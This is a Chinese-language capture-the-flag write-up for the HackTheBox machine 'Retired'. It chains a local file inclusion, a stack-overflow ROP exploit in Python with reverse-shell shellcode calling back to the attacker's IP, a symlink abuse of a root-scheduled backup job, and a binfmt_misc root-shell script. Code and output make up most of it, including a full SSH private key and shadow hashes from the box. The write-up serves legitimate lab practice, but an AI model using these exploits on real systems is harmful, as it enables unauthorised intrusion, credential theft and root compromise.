Retired - HackTheBox

基本信息

• https://www.hackthebox.com/home/machines/profile/456
• 10.10.11.154

端口扫描

22和80:

$ nmap -sC -sV 10.10.11.154
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-23 12:53 CST
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
Nmap scan report for 10.10.11.154
Host is up (0.19s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
|   3072 77:b2:16:57:c2:3c:10:bf:20:f1:62:76:ea:81:e4:69 (RSA)
|   256 cb:09:2a:1b:b9:b9:65:75:94:9d:dd:ba:11:28:5b:d2 (ECDSA)
|_  256 0d:40:f0:f5:a8:4b:63:29:ae:08:a1:66:c1:26:cd:6b (ED25519)
80/tcp open  http    nginx
| http-title: Agency - Start Bootstrap Theme
|_Requested resource was /index.php?page=default.html
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 117.14 seconds

80

访问自动跳转首页，page参数加载页面，很可能存在LFI：

目录扫描

目录扫描可以发现一个beta.html,存在上传功能：

gobuster dir -w ~/Tools/dict/SecLists/Discovery/Web-Content/common.txt  -t 50 -u http://10.10.11.154/  -x html,php,txt

/assets               (Status: 301) [Size: 162] [--> http://10.10.11.154/assets/]
/beta.html            (Status: 200) [Size: 4144]
/css                  (Status: 301) [Size: 162] [--> http://10.10.11.154/css/]
/default.html         (Status: 200) [Size: 11414]
/index.php            (Status: 302) [Size: 0] [--> /index.php?page=default.html]
/index.php            (Status: 302) [Size: 0] [--> /index.php?page=default.html]
/js                   (Status: 301) [Size: 162] [--> http://10.10.11.154/js/]

beta.html

upload

尝试上传文件，发现activate_license.php：

LFI

验证存在，会跳转到首页，所以通过repeater或者直接使用curl：

activate_license.php

LFI读前面的activate_license.php，发现本地1337端口的服务：

/proc/sched_debug

因为1337端口这是另一个进程，首先通过sched_debug获取进程信息：

/proc/pid/cmdline

然后根据pid再去获取其他信息,得到文件路径：

activate_license1337

下载下来分析，接下来就是二进制部分了

curl "http://10.10.11.154/index.php?page=/usr/bin/activate_license" --output activate_license

$ file activate_license
activate_license: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=554631debe5b40be0f96cabea315eedd2439fb81, for GNU/Linux 3.2.0, with debug_info, not stripped

checksec activate_license
[*] activate_license
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      PIE enabled

rop

基础rop，各种保护所需要的信息可以通过LFI去读maps获取,最终打到www-data:

offset 520

maps

559bc36a6000-559bc36a7000 r--p 00000000 08:01 2408                       /usr/bin/activate_license
559bc36a7000-559bc36a8000 r-xp 00001000 08:01 2408                       /usr/bin/activate_license
559bc36a8000-559bc36a9000 r--p 00002000 08:01 2408                       /usr/bin/activate_license
559bc36a9000-559bc36aa000 r--p 00002000 08:01 2408                       /usr/bin/activate_license
559bc36aa000-559bc36ab000 rw-p 00003000 08:01 2408                       /usr/bin/activate_license
559bc3ba7000-559bc3bc8000 rw-p 00000000 00:00 0                          [heap]
7f68d48b9000-7f68d48bb000 rw-p 00000000 00:00 0 
7f68d48bb000-7f68d48bc000 r--p 00000000 08:01 3635                       /usr/lib/x86_64-linux-gnu/libdl-2.31.so
7f68d48bc000-7f68d48be000 r-xp 00001000 08:01 3635                       /usr/lib/x86_64-linux-gnu/libdl-2.31.so
7f68d48be000-7f68d48bf000 r--p 00003000 08:01 3635                       /usr/lib/x86_64-linux-gnu/libdl-2.31.so
7f68d48bf000-7f68d48c0000 r--p 00003000 08:01 3635                       /usr/lib/x86_64-linux-gnu/libdl-2.31.so
7f68d48c0000-7f68d48c1000 rw-p 00004000 08:01 3635                       /usr/lib/x86_64-linux-gnu/libdl-2.31.so
7f68d48c1000-7f68d48c8000 r--p 00000000 08:01 3645                       /usr/lib/x86_64-linux-gnu/libpthread-2.31.so
7f68d48c8000-7f68d48d8000 r-xp 00007000 08:01 3645                       /usr/lib/x86_64-linux-gnu/libpthread-2.31.so
7f68d48d8000-7f68d48dd000 r--p 00017000 08:01 3645                       /usr/lib/x86_64-linux-gnu/libpthread-2.31.so
7f68d48dd000-7f68d48de000 r--p 0001b000 08:01 3645                       /usr/lib/x86_64-linux-gnu/libpthread-2.31.so
7f68d48de000-7f68d48df000 rw-p 0001c000 08:01 3645                       /usr/lib/x86_64-linux-gnu/libpthread-2.31.so
7f68d48df000-7f68d48e3000 rw-p 00000000 00:00 0 
7f68d48e3000-7f68d48f2000 r--p 00000000 08:01 3636                       /usr/lib/x86_64-linux-gnu/libm-2.31.so
7f68d48f2000-7f68d498c000 r-xp 0000f000 08:01 3636                       /usr/lib/x86_64-linux-gnu/libm-2.31.so
7f68d498c000-7f68d4a25000 r--p 000a9000 08:01 3636                       /usr/lib/x86_64-linux-gnu/libm-2.31.so
7f68d4a25000-7f68d4a26000 r--p 00141000 08:01 3636                       /usr/lib/x86_64-linux-gnu/libm-2.31.so
7f68d4a26000-7f68d4a27000 rw-p 00142000 08:01 3636                       /usr/lib/x86_64-linux-gnu/libm-2.31.so
7f68d4a27000-7f68d4a4c000 r--p 00000000 08:01 3634                       /usr/lib/x86_64-linux-gnu/libc-2.31.so
7f68d4a4c000-7f68d4b97000 r-xp 00025000 08:01 3634                       /usr/lib/x86_64-linux-gnu/libc-2.31.so
7f68d4b97000-7f68d4be1000 r--p 00170000 08:01 3634                       /usr/lib/x86_64-linux-gnu/libc-2.31.so
7f68d4be1000-7f68d4be2000 ---p 001ba000 08:01 3634                       /usr/lib/x86_64-linux-gnu/libc-2.31.so
7f68d4be2000-7f68d4be5000 r--p 001ba000 08:01 3634                       /usr/lib/x86_64-linux-gnu/libc-2.31.so
7f68d4be5000-7f68d4be8000 rw-p 001bd000 08:01 3634                       /usr/lib/x86_64-linux-gnu/libc-2.31.so
7f68d4be8000-7f68d4bec000 rw-p 00000000 00:00 0 
7f68d4bec000-7f68d4bfc000 r--p 00000000 08:01 5321                       /usr/lib/x86_64-linux-gnu/libsqlite3.so.0.8.6
7f68d4bfc000-7f68d4cf4000 r-xp 00010000 08:01 5321                       /usr/lib/x86_64-linux-gnu/libsqlite3.so.0.8.6
7f68d4cf4000-7f68d4d28000 r--p 00108000 08:01 5321                       /usr/lib/x86_64-linux-gnu/libsqlite3.so.0.8.6
7f68d4d28000-7f68d4d2c000 r--p 0013b000 08:01 5321                       /usr/lib/x86_64-linux-gnu/libsqlite3.so.0.8.6
7f68d4d2c000-7f68d4d2f000 rw-p 0013f000 08:01 5321                       /usr/lib/x86_64-linux-gnu/libsqlite3.so.0.8.6
7f68d4d2f000-7f68d4d31000 rw-p 00000000 00:00 0 
7f68d4d36000-7f68d4d37000 r--p 00000000 08:01 3630                       /usr/lib/x86_64-linux-gnu/ld-2.31.so
7f68d4d37000-7f68d4d57000 r-xp 00001000 08:01 3630                       /usr/lib/x86_64-linux-gnu/ld-2.31.so
7f68d4d57000-7f68d4d5f000 r--p 00021000 08:01 3630                       /usr/lib/x86_64-linux-gnu/ld-2.31.so
7f68d4d60000-7f68d4d61000 r--p 00029000 08:01 3630                       /usr/lib/x86_64-linux-gnu/ld-2.31.so
7f68d4d61000-7f68d4d62000 rw-p 0002a000 08:01 3630                       /usr/lib/x86_64-linux-gnu/ld-2.31.so
7f68d4d62000-7f68d4d63000 rw-p 00000000 00:00 0 
7ffdd5ef5000-7ffdd5f16000 rw-p 00000000 00:00 0                          [stack]
7ffdd5f4b000-7ffdd5f4f000 r--p 00000000 00:00 0                          [vvar]
7ffdd5f4f000-7ffdd5f51000 r-xp 00000000 00:00 0                          [vdso]

exp.py

#!/usr/bin/python3
import requests
from pwn import *

def kill(sig, frame):
    print("\n[\033[1;31m-\033[1;37m] Saliendo\n")
    sys.exit(1)

signal.signal(signal.SIGINT, kill)

inip = input("\n[\033[1;34m*\033[1;37m] Introduce tu ip (tun0): ")
inport = ("443")

def file(path):
    request = requests.get(f"http://10.10.11.154/index.php?page={path}", allow_redirects=False)
    rpath = f"/tmp/{path.split('/')[-1]}"
    with open(rpath,"wb") as f:
        f.write(request.content)
    return rpath

def rpid():
    request = requests.get(f"http://10.10.11.154/index.php?page=/proc/sched_debug", allow_redirects=False)
    pid = re.search("activate_licens\s+([0-9]+)",request.text).group(1)
    return pid

def adrs(pid):
    r = requests.get(f"http://10.10.11.154/index.php?page=/proc/{pid}/maps", allow_redirects=False)
    libcb = int(re.search("^.*libc.*$", r.text, re.M).group(0).split("-")[0], 16)
    libcp = re.search("^.*libc.*$", r.text, re.M).group(0).split(" ")[-1]
    libsb = int(re.search("^.*libsqlite.*$", r.text, re.M).group(0).split("-")[0], 16)
    libsp = re.search("^.*libsqlite.*$", r.text, re.M).group(0).split(" ")[-1]
    sbase = int(re.search("^.*\[stack\].*$", r.text, re.M).group(0).split("-")[0], 16)
    ssend = int(re.search("^.*\[stack\].*$", r.text, re.M).group(0).split("-")[1].split()[0], 16)
    return libcb, libcp,libsb, libsp, sbase, ssend

def bof():
    ip = socket.inet_aton(inip)
    port =  port=struct.pack(">H",int(inport))

    payload =  b""
    payload += b"\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01\x5e\x0f\x05\x48"
    payload += b"\x97\x48\xb9\x02\x00"   + port  +  ip +   b"\x51\x48"
    payload += b"\x89\xe6\x6a\x10\x5a\x6a\x2a\x58\x0f\x05\x6a\x03\x5e"
    payload += b"\x48\xff\xce\x6a\x21\x58\x0f\x05\x75\xf6\x6a\x3b\x58"
    payload += b"\x99\x48\xbb\x2f\x62\x69\x6e\x2f\x73\x68\x00\x53\x48"
    payload += b"\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05"

    pid = rpid()

    libcb, libcp, libsb, libsp, sbase, ssend = adrs(pid)

    ssize = ssend - sbase

    context.clear(arch='amd64')
    libc = ELF(file(libcp),checksec=False)
    libc.address = libcb
    libsql = ELF(file(libsp),checksec=False)
    libsql.address = libsb
    rop = ROP([libc, libsql])

    offset = 520

    prt = libc.symbols['mprotect']
    rdi = rop.rdi[0]
    rsi = rop.rsi[0]
    rdx = rop.rdx[0]
    rsp = rop.jmp_rsp[0]

    exploit = b'A' * offset

    exploit += p64(rdi) + p64(sbase)
    exploit += p64(rsi) + p64(ssize)
    exploit += p64(rdx) + p64(7)
    exploit += p64(prt)
    exploit += p64(rsp)
    exploit += payload

    requests.post(f"http://10.10.11.154/activate_license.php", files = { "licensefile": exploit } )

threading.Thread(target=bof, args=()).start()
shell = listen(443, timeout=60).wait_for_connection()
shell.sendline(b"export TERM=xterm HOME=/var/www")
shell.interactive()

website_backup

枚举可以发现一个website_backup定时运行,其中调用的是/usr/bin/webbackup：

systemctl list-timers

Thu 2022-06-23 05:24:00 UTC 31s left      Thu 2022-06-23 05:23:09 UTC 19s ago              website_backup.timer         website_backup.service

$ find / -name website_backup.service 2>/dev/null
/etc/systemd/system/website_backup.service

$ cat /etc/systemd/system/website_backup.service
[Unit]
Description=Backup and rotate website

[Service]
User=dev
Group=www-data
ExecStart=/usr/bin/webbackup

[Install]
WantedBy=multi-user.target

/usr/bin/webbackup

继续检查这个，发现其中调用zip，我们可以考虑使用软链接让它压缩我们想要获取的文件：

$ cat /usr/bin/webbackup
#!/bin/bash
set -euf -o pipefail

cd /var/www/

SRC=/var/www/html
DST="/var/www/$(date +%Y-%m-%d_%H-%M-%S)-html.zip"

/usr/bin/rm --force -- "$DST"
/usr/bin/zip --recurse-paths "$DST" "$SRC"

KEEP=10
/usr/bin/find /var/www/ -maxdepth 1 -name '*.zip' -print0 \
    | sort --zero-terminated --numeric-sort --reverse \
    | while IFS= read -r -d '' backup; do
        if [ "$KEEP" -le 0 ]; then
            /usr/bin/rm --force -- "$backup"
        fi
        KEEP="$((KEEP-1))"
    done

软链接

所以就是创建一个软链接，等待执行后去解压生成的zip文件，获取对应文件

$ cd /var/www/html
$ ln -s /home/dev/.ssh/id_rsa id_rsa

$ cp /var/www/2022-06-23_05-50-09-html.zip /tmp
$ cd /tmp
$ unzip 2022-06-23_05-50-09-html.zip

$ cat var/www/html/id_rsa

dev_id_rsa

-----BEGIN OPENSSH PRIVATE KEY-----
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
7rTyG3wbNka1sAAAALZGV2QHJldGlyZWQ=
-----END OPENSSH PRIVATE KEY-----

user flag

使用得到的私钥登录dev用户：

emuemu

emuemu目录里两个二进制文件，提供有源码：

reg_helper发现binfmt_misc相关：

搜索可以发现实际使用的lib目录下的reg_helper,和当前目录的一致：

也可以发现binfmt_misc相关利用：

• toffan/binfmt_misc: Kernel Support for miscellaneous (your favourite) exploits
  https://github.com/toffan/binfmt_misc

提权 & root flag

上面的脚本修改一些代码为当前环境信息，运行，root

• 删除not_writeable因为我们没有对应的写权限
• 最终的echo那里使用对应文件

echo "$binfmt_line" > "$mountpoint"/register
echo "$binfmt_line" | /usr/lib/emuemu/reg_helper

exp.sh

#!/bin/bash

readonly searchsuid="/bin/"
readonly mountpoint="/proc/sys/fs/binfmt_misc"
readonly exe="$0"


warn()
{
    1>&2 echo $@
}

die()
{
    warn $@
    exit -1
}

usage()
{
    cat 1>&2 <<EOF
Usage: $exe
    Gives you a root shell if /proc/sys/fs/binfmt_misc/register is writeable,
    note that it must be enforced by any other mean before your try this, for
    example by typing something like "sudo chmod +6 /*/*/f*/*/*r" while Dave is
    thinking that you are fixing his problem.
EOF
    exit 1
}

function pick_suid()
{
	find "$1" -perm -4000 -executable \
	    | tail -n 1
}

function read_magic()
{
    [[ -e "$1" ]] && \
    [[ "$2" =~ [[:digit:]]+ ]] && \
    dd if="$1" bs=1 count="$2" status=none \
        | sed -e 's-\x00-\\x00-g'
}

[[ -n "$1" ]] && usage

target="$(pick_suid "$searchsuid")"
test -e "$target" || die "Error: Unable to find a suid binary in $searchsuid"

binfmt_magic="$(read_magic "$target" "126")"
test -z "$binfmt_magic" && die "Error: Unable to retrieve a magic for $target"

fmtname="$(mktemp -u XXXX)"
fmtinterpr="$(mktemp)"

gcc -o "$fmtinterpr" -xc - <<- __EOF__
	#include <stdlib.h>
	#include <unistd.h>
	#include <stdio.h>
	#include <pwd.h>

	int main(int argc, char *argv[])
	{
		// remove our temporary file
		unlink("$fmtinterpr");

		// remove the unused binary format
		FILE* fmt = fopen("$mountpoint/$fmtname", "w");
		fprintf(fmt, "-1\\n");
		fclose(fmt);

		// MOTD
		setuid(0);
		uid_t uid = getuid();
		uid_t euid = geteuid();
		struct passwd *pw = getpwuid(uid);
		struct passwd *epw = getpwuid(euid);
		fprintf(stderr, "uid=%u(%s) euid=%u(%s)\\n",
			uid,
			pw->pw_name,
			euid,
			epw->pw_name);

		// welcome home
		char* sh[] = {"/bin/sh", (char*) 0};
		execvp(sh[0], sh);
		return 1;
	}
__EOF__

chmod a+x "$fmtinterpr"

binfmt_line="_${fmtname}_M__${binfmt_magic}__${fmtinterpr}_OC"
echo "$binfmt_line" | /usr/lib/emuemu/reg_helper

exec "$target"

shadow

root:$y$j9T$WTPWClbhbDs7l.UxQ36u80$ARJoOe6zhfOEca5WFBXjo4fGaxCg1Iof6qTbrfn1CzA:19062:0:99999:7:::
dev:$6$kxjJ4ZicR62IY8ot$YKNoHWo9jQdRnNQ2f9dKX4IUI70ocRkClcIjUfoI/RF0.q6UeWLf2Jb8AfNyBHjJPxS0o5a7MhBR9g.eNfu8/.:18913:0:99999:7:::

参考资料

• toffan/binfmt_misc: Kernel Support for miscellaneous (your favourite) exploits
  https://github.com/toffan/binfmt_misc
• HTB - Retired (Box) | BreachForums
  https://breached.to/Thread-HTB-Retired-Box?highlight=Retired
• Writeup Retired HackTheBox
  https://gatogamer1155.github.io/hackthebox/retired/
• Autopwns/Retired at main · GatoGamer1155/Autopwns
  https://github.com/GatoGamer1155/Autopwns/tree/main/Retired